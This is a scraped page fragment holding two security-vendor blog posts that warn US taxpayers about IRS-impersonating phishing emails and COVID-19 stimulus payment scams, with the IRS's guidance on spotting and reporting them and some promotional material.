<p><a href="#_ftnref1">[1]</a> <a href="https://www.bankinfosecurity.com/irs-warns-fresh-fraud-tactics-as-tax-season-starts-a-16028?rf=2021-02-22_ENEWS_SUB_BIS__Slot6_ART16028">https://www.bankinfosecurity.com/irs-warns-fresh-fraud-tactics-as-tax-season-starts-a-16028?rf=2021-02-22_ENEWS_SUB_BIS__Slot6_ART16028</a></p></div>Phishing emails from the “IRS” are Backhttps://redskyalliance.org/xindustry/phishing-emails-from-the-irs-are-back2020-11-24T16:10:45.000Z2020-11-24T16:10:45.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}8211410658,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8211410658,RESIZE_400x{{/staticFileLink}}" width="250" alt="8211410658?profile=RESIZE_400x" /></a>In the US, many people fear the Internal Revenue Service (IRS). When a US citizen receives any type communication from the IRS, people take notice. The cyber bad guys know that too and send IRS phishing messages to unwitting US citizens. In addition to receiving scam voice mails and texts about your Social Security number being at risk, a “credible looking” yet fake, IRS email has been sent to tens of thousands of email inboxes across the US. The question of authenticity can be explained in one quote, "The IRS does not send emails about your tax refund or sensitive financial information," says the IRS Commissioner. But hackers continue to send phishing scams capitalizing on the concerns of the pandemic related Economic Impact Payments and the entire international COVID-19 concerns. </p>
<p>The fake email looks like it came from support@irs.gov, and the email claims that the IRS could not reach you by phone so now it is emailing you with a demand for more than $1,400 you supposedly owe in taxes. Failure to pay, the letter says, will lead to a visit from the sheriff's department and a notification to credit bureaus. Per the fraudulent email message, "The opportunity to take care of this voluntarily is quickly coming to an end... you can email back to the get the payment mode... please let us know what your intention is by today so we can hold your case or else we will submit the paperwork to the local county Sheriff's Department." This is very upsetting to many, who will act on the fake message.</p>
<p>If you get an email like this, it should be an instant red flag because cybercriminals love to use fear and urgency in their phishing campaigns. They hope you will take action before you think about it. Researchers at Abnormal Security tracked this phishing campaign after it reached between 50,000 to 70,000 email accounts and produced the following findings: this specific campaign is even more convincing, because the attackers spoofed or imitated a legitimate domain. If a reader takes the time to look closer, one would find clues this email is a fake. Although the email appears to originate from the domain 'irs.gov', analysis of the email <em>headers</em> reveal that the true sender domain is 'shoesbagsall.com'. Additionally, the 'Reply-To' email is 'legal.cc@outlook.com', which is not associated with the IRS and instead leads directly back to the attacker.</p>
<p>These are two obvious indicators of fraud, but they are certainly not the only ones. IRS related phishing scams target different audiences. Some target tax preparers, others target human resources (HR) and payroll teams or services, and some may be directed to individual tax payers.</p>
<p>What is the biggest problems with an email or text message claiming to come from the IRS with information about a refund, a balance owed, or a request to verify W-2 data? The IRS will never send email like these. Ignore them, PERIOD.</p>
<p>If you have any questions about an email that states it is from the IRS, stop reading it and immediately visit: <a href="https://www.irs.gov/privacy-disclosure/report-phishing%C2%A0">https://www.irs.gov/privacy-disclosure/report-phishing </a> Per the link: "The IRS doesn't initiate contact with taxpayers by email, text messages or social media channels to request personal or financial information. This includes requests for PIN numbers, passwords or similar access information for credit cards, banks or other financial accounts."</p>
<p>The Internal Revenue Service provides a list of things it will not do. Looking at this list can help you avoid being scammed. The IRS will not:</p>
<ul>
<li>Call to demand immediate payment using a specific payment method such as a prepaid debit card, gift card or wire transfer. Generally, the IRS will first mail a bill to any taxpayer who owes taxes.</li>
<li>Demand that you pay taxes without the opportunity to question or appeal the amount they say you owe. You should also be advised of your rights as a taxpayer.</li>
<li>Threaten to bring in local police, immigration officers or other law-enforcement to have you arrested for not paying. The IRS also cannot revoke your driver’s license, business licenses, or immigration status.</li>
<li>If you or a friend/relative, especially a senior citizen receive emails relating to these things, you can be quite confident they are fake.</li>
<li>The IRS has several options for reporting IRS related scams, depending on the type of phishing attack you received and whether or not you or your organization fell for it.</li>
<li>For individual phishing emails that you believe are fake:</li>
<li>Forward the scam or phishing email to phishing@irs.gov.</li>
<li>For W-2 related phishing scams, the IRS suggests the following:</li>
<li>If you accidentally gave cybercriminals W-2 information, email dataloss@irs.gov to notify the IRS of a W-2 data loss and provide contact information. In the subject line, type "W2 Data Loss" so that the email can be routed properly. Do not attach any employee personally identifiable information (PII).</li>
<li>Businesses/payroll service providers should file a complaint with the FBI's Internet Crime Complaint Center (IC3.gov). Businesses/payroll service providers may be asked to file a report with their local law enforcement.</li>
<li>Notify employees so they may take steps to protect themselves from identity theft. The FTC's <a href="http://www.identitytheft.gov">www.identitytheft.gov</a> provides general guidance.</li>
<li>The IRS says it initiates most contacts through USPS mail, not emailing or texting or phone calls. That is important to keep in mind next time an urgent IRS phishing email arrives in your email inbox.</li>
</ul>
<p>Red Sky Alliance has been analyzing and documenting cyber threats, vulnerabilities and cyber scams for over 9 years and maintains a resource library of malware and cyber actor reports. Malware comes and goes, but often they are dusted off and reappears in current campaigns.</p>
<p>Join our Alliance at: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a> It’s FREE.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p>Weekly Cyber Intelligence Briefings: </p>
<p><a href="https://attendee.gotowebinar.com/register/8782169210544615949">https://attendee.gotowebinar.com/register/8782169210544615949</a></p>
<p> </p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a> </li>
</ul>
<p> </p></div>US IRS Warns of New Economic Stimulus Payment Scamshttps://redskyalliance.org/xindustry/us-irs-warns-of-new-economic-stimulus-payment-scams2020-04-28T12:46:28.000Z2020-04-28T12:46:28.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}4537443479,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}4537443479,RESIZE_400x{{/staticFileLink}}" width="250" alt="4537443479?profile=RESIZE_400x" /></a>US Tax Day has come and gone. Due to the COVID-19 pandemic, the US has delayed the filing deadline to July 15<sup>th</sup>. That is great news for many, AND additionally many taxpayers will be eligible for the US New Economic Stimulus program. The Internal Revenue Service (IRS) is now issuing warnings to alert the US public about a flood in Corona Virus-related scams over email, phone calls, or social media requesting personal identifying information (pii) while using the pandemic economic impact payments as a disturbing lure. This fraud wave has led to identity theft and tax-related fraud is using the COVID-19 crisis to trick desperate individuals into sharing their sensitive pii in exchange for help to quicken their entitled COVID-19 economic impact payments. These unscrupulous scammers never seem to take a day off and whenever possible, they will take advantage of a disaster to selfishly benefit themselves.</p>
<p>The IRS will never contact you for the information they already have in their records. "We urge people to take extra care during this period. The IRS isn't going to call you asking to verify or provide your financial information so you can get an economic impact payment or your refund faster," IRS Commissioner Chuck Rettig said. "That also applies to surprise emails that appear to be coming from the IRS. Remember, don't open them or click on attachments or links. Go to IRS.gov for the most up-to-date information." Cyber threat analysts with Red Sky Alliance are currently tracking numerous variants of malware being used in conjunction with good old fashion social engineering and phishing campaigns. In politics there is a saying that you should never left a disaster go to waste. Well, the same hold true with criminal behavior. </p>
<p>The COVID-19 economic impact payments are going to be distributed within the next few weeks, even though scammers will promise to get them deposited in your bank account a lot faster, as United States Attorney for Eastern Kentucky Robert M. Duncan explained in a US Department of Justice March 2020 press release and reinforced through many federal partners like US SEN. J. Shaheen, D-NH. Most of the eligible Americans will have the funds sent as a direct deposit into their bank accounts per the US Department of the Treasury, while those without direct deposit capabilities will receive the approved $1,200 economic impact payments via paper check.<a href="#_ftn1">[1]</a> The scammers attempting to exploit taxpayers' hardship caused by the COVID-19 pandemic and playing on their anxiousness to receive already approved payments, try to get them to 'verify' the information needed for the money to be deposited. This stolen information will be used later by the crooks to file false tax returns as part of identity theft schemes. "Because of this, everyone receiving money from the government from the COVID-19 economic impact payment is at risk," US Attorney Duncan warned.</p>
<p><a href="{{#staticFileLink}}4537450570,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}4537450570,RESIZE_400x{{/staticFileLink}}" width="250" alt="4537450570?profile=RESIZE_400x" /></a>Retired US citizens are the most exposed to these scams and are reminded by the US IRS that it will not ask them for info related to the coronavirus economic impact payment by phone, email, mail or in person; again they already have the information and do not need to verify any information. If you have older relatives, please speak to them as soon as possible about not sharing any pii to any caller, email or USPS request. Scammers use a wide variety of tactics to trick people into sharing their personal or financial information, with some of them potentially attempting to:</p>
<ul>
<li>Emphasize the words "Stimulus Check" or "Stimulus Payment." The official term is economic impact payment.</li>
<li>Scammer ask the taxpayer to sign over their economic impact payment check to them.</li>
<li>Ask by phone, email, text or social media for verification of personal and/or banking information saying that the information is needed to receive or speed up their economic impact payment.</li>
<li>Suggest that they can get a tax refund or economic impact payment faster by working on the taxpayer's behalf. This scam could be conducted by social media or even in person.</li>
<li>Mail the taxpayer a bogus check, perhaps in an odd amount, then tell the taxpayer to call a number or verify information online in order to cash it.</li>
</ul>
<p>Taxpayers should in no situation share their banking information with others when being asked to provide them by any party. "Those taxpayers who have previously filed but not provided direct deposit information to the IRS will be able to provide their banking information online to a newly designed secure portal on IRS.gov in mid-April," the IRS said.</p>
<p>Detailed and official info on the COVID-19 economic impact payments is available on the IRS.gov Coronavirus Tax Relief page, with info on who is eligible and how will the IRS know where to send the payments accessible here.</p>
<p>Taxpayers who have been or will be targeted by fraudsters with Coronavirus-related or other types of phishing attempts via unsolicited emails, text messages, or social media are urged by the IRS to report them to phishing@irs.gov. </p>
<p>Red Sky Alliance has been has analyzing and documenting cyber threats for 8 years and maintains a resource library of malware and cyber actor reports. </p>
<p>The installation, updating and monitoring of firewalls, cyber security and proper employee training are keys to blocking attacks. Please feel free to contact our analyst team for research assistance and Cyber Threat Analysis on your organization.</p>
<p>What can you do to better protect your organization today?</p>
<ul>
<li>All data in transmission and at rest should be encrypted.</li>
<li>Proper data back-up and off-site storage policies should be adopted and followed.</li>
<li>Update disaster recovery plans and emergency procedures with cyber threat recovery procedures.</li>
<li>Institute cyber threat and phishing training for all employees, with testing and updating.</li>
<li>Recommend/require cyber security software, services and devices to be used by all at home working employees and consultants.</li>
<li>Review and update your cyber threat and information security policies and procedures. Make them a part of all emergency planning and training.</li>
<li>Ensure that all software updates and patches are installed immediately.</li>
<li>Enroll your company/organization in RedXray for daily cyber threat notifications are directed at your domains. RedXray service is $500 a month and provides threat intelligence on nine (9) cyber threat categories including Keyloggers, with having to connect to your network.</li>
<li>Purchase annual cyber insurance coverage from Red Sky Alliance provided by Cysurance.</li>
</ul>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> Interested in a RedXray demonstration or subscription to see what we can do for you? Sign up here: <a href="https://www.wapacklabs.com/redxray">https://www.wapacklabs.com/redxray</a> </p>
<p><strong>Reporting: </strong><a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a><br /><strong>Website: </strong><a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a><br /><strong>LinkedIn: </strong><a href="https://www.linkedin.com/company/wapacklabs/">https://www.linkedin.com/company/wapacklabs/</a><br /><strong>Twitter: </strong><a href="https://twitter.com/wapacklabs?lang=en">https://twitter.com/wapacklabs?lang=en</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.bleepingcomputer.com/news/security/irs-warns-of-surge-in-economic-stimulus-payment-scams/">https://www.bleepingcomputer.com/news/security/irs-warns-of-surge-in-economic-stimulus-payment-scams/</a></p></div>